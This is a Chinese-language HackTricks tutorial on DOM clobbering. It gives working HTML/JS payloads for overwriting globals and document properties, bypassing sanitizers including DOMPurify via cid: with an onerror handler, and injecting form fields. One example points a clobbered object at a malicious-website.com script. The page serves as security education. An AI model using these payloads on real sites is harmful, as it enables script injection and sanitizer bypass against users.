12 KiB
Dom Clobbering
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
- 你在网络安全公司工作吗?想要看到你的公司在HackTricks上做广告吗?或者想要获取PEASS的最新版本或下载HackTricks的PDF吗?查看订阅计划!
- 探索PEASS家族,我们独家的NFTs收藏品
- 获取官方PEASS和HackTricks周边产品
- 加入 💬 Discord群 或 电报群 或 关注我的Twitter 🐦@carlospolopm。
- 通过向 hacktricks仓库 和 hacktricks-cloud仓库 提交PR来分享你的黑客技巧。
基础知识
可以使用HTML标签中的**id和name属性在JS上下文中生成全局变量**。
<form id=x></form>
<script> console.log(typeof document.x) //[object HTMLFormElement] </script>
只有某些元素可以使用name属性来覆盖全局变量,它们是:embed、form、iframe、image、img和object。
有趣的是,当您使用form元素来覆盖一个变量时,您将获得元素本身的**toString值:[object HTMLFormElement],但使用anchor时,toString将是锚点的href。因此,如果您使用a标签来覆盖,您可以在将其视为字符串时控制该值**:
<a href="controlled string" id=x></a>
<script>
console.log(x);//controlled string
</script>
数组和属性
也可以篡改数组和对象属性:
<a id=x>
<a id=x name=y href=controlled>
<script>
console.log(x[1])//controlled
console.log(x.y)//controlled
</script>
要覆盖第三个属性(例如 x.y.z),您需要使用一个**form**:
<form id=x name=y><input id=z value=controlled></form>
<form id=x></form>
<script>
alert(x.y.z.value)//controlled
</script>
通过使用 iframes,覆盖更多属性会变得更加复杂但仍然可能:
<iframe name=x srcdoc="<a id=y href=controlled></a>"></iframe>
<style>@import 'https://google.com';</style>
<script>alert(x.y)//controlled</script>
{% hint style="warning" %} 样式标签用于给iframe足够的时间来渲染。如果没有它,你会发现一个未定义的警报。 {% endhint %}
要深入破坏更多属性,可以使用带有HTML编码的iframe,如下所示:
<iframe name=a srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;#x20;name=e&amp;#x20;href=\controlled&amp;gt;<a&amp;#x20;id=d&amp;gt; name=d>' name=b>"></iframe>
<style>@import 'https://google.com';</style>
<script>
alert(a.b.c.d.e)//controlled
</script>
绕过过滤器
如果一个过滤器正在通过类似 document.getElementByID('x').attributes 这样的方式循环遍历节点的属性,你可以覆盖属性**.attributes并破坏过滤器**。其他 DOM 属性如**tagName、nodeName或parentNode等也是可以覆盖**的。
<form id=x></form>
<form id=y>
<input name=nodeName>
</form>
<script>
console.log(document.getElementById('x').nodeName)//FORM
console.log(document.getElementById('y').nodeName)//[object HTMLInputElement]
</script>
Clobbering window.someObject
在 JavaScript 中经常会发现:
var someObject = window.someObject || {};
操纵页面上的HTML允许用DOM节点覆盖someObject,可能引入安全漏洞。例如,您可以用指向恶意脚本的锚元素替换someObject:
<a id=someObject href=//malicious-website.com/malicious.js></a>
在一个易受攻击的代码中,例如:
<script>
window.onload = function(){
let someObject = window.someObject || {};
let script = document.createElement('script');
script.src = someObject.url;
document.body.appendChild(script);
};
</script>
这种方法利用脚本源来执行不需要的代码。
技巧:DOMPurify 允许您使用 cid: 协议,该协议不会对双引号进行 URL 编码。这意味着您可以注入一个编码的双引号,在运行时将被解码。因此,注入类似于 <a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:"onerror=alert(1)//"> 这样的内容将使 HTML 编码的 " 在运行时解码并从属性值中逃逸,以创建 onerror 事件。
另一种技术使用了一个 form 元素。某些客户端库会检查新创建的表单元素的属性以进行清理。但是,通过在表单内添加一个带有 id=attributes 的 input,您实际上覆盖了属性,阻止了消毒剂访问实际属性。
覆盖文档对象
根据文档,可以使用 DOM 覆盖来覆盖文档对象的属性:
文档接口支持命名属性。文档对象在任何时刻支持的属性名称包括以下内容,按照贡献它们的元素的树顺序排列,忽略后续的重复,并且在相同元素同时贡献 id 属性和 name 属性时,来自 id 属性的值优先于来自 name 属性的值:
- 所有具有非空名称内容属性并且在文档树中具有文档作为根的公开 embed、form、iframe、img和公开 object元素的名称内容属性的值;
- 所有具有非空id内容属性并且在文档树中具有文档作为根的公开 object元素的id内容属性的值;
- 所有具有非空id内容属性和非空名称内容属性的id内容属性的值的img元素,且在文档树中具有文档作为根。
使用这种技术,您可以覆盖常用的值,如 document.cookie、document.body、document.children,甚至文档接口中的方法,如 document.querySelector。
document.write("<img name=cookie />")
document.cookie
<img name="cookie">
typeof(document.cookie)
'object'
//Something more sanitize friendly than a img tag
document.write("<form name=cookie><input id=toString></form>")
document.cookie
HTMLCollection(2) [img, form, cookie: img]
typeof(document.cookie)
'object
在元素被篡改后写入
对 document.getElementById() 和 document.querySelector() 的调用结果可以通过注入具有相同id属性的 <html> 或 <body> 标签来进行更改。以下是如何实现的:
<div style="display:none" id="cdnDomain" class="x">test</div>
<p>
<html id="cdnDomain" class="x">clobbered</html>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
alert(document.querySelector('.x').innerText); // Clobbered
</script>
此外,通过使用样式来隐藏这些注入的HTML/body标签,可以防止innerText中其他文本的干扰,从而增强攻击的效果:
<div style="display:none" id="cdnDomain">test</div>
<p>existing text</p>
<html id="cdnDomain">clobbered</html>
<style>
p{display:none;}
</style>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
调查发现SVG可以有效地利用<body>标签:
<div style="display:none" id="cdnDomain">example.com</div>
<svg><body id="cdnDomain">clobbered</body></svg>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
要使HTML标签在Chrome和Firefox等浏览器中在SVG内起作用,需要使用<foreignobject>标签:
<div style="display:none" id="cdnDomain">example.com</div>
<svg>
<foreignobject>
<html id="cdnDomain">clobbered</html>
</foreignobject>
</svg>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
Clobbering Forms
可以通过在某些标签中指定form属性来向表单中添加新条目。您可以使用这种方法向表单中添加新值,甚至可以添加一个新的按钮来发送它(点击劫持或滥用一些.click() JS代码):
<!--Add a new attribute and a new button to send-->
<textarea form=id-other-form name=info>
";alert(1);//
</textarea>
<button form=id-other-form type="submit" formaction="/edit" formmethod="post">
Click to send!
</button>
{% endcode %}
- 有关更多表单属性,请查看此处。
参考资料
- https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering
- https://portswigger.net/web-security/dom-based/dom-clobbering
- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker.
从零开始学习AWS黑客技术 htARTE (HackTricks AWS Red Team Expert)!
- 您在网络安全公司工作吗? 您想看到您的公司在HackTricks中做广告吗? 或者您想访问PEASS的最新版本或下载PDF格式的HackTricks吗? 请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS & HackTricks周边
- 加入 💬 Discord群 或 电报群 或 在Twitter上 🐦@carlospolopm.
- 通过向 hacktricks repo 和 hacktricks-cloud repo 提交PR来分享您的黑客技巧。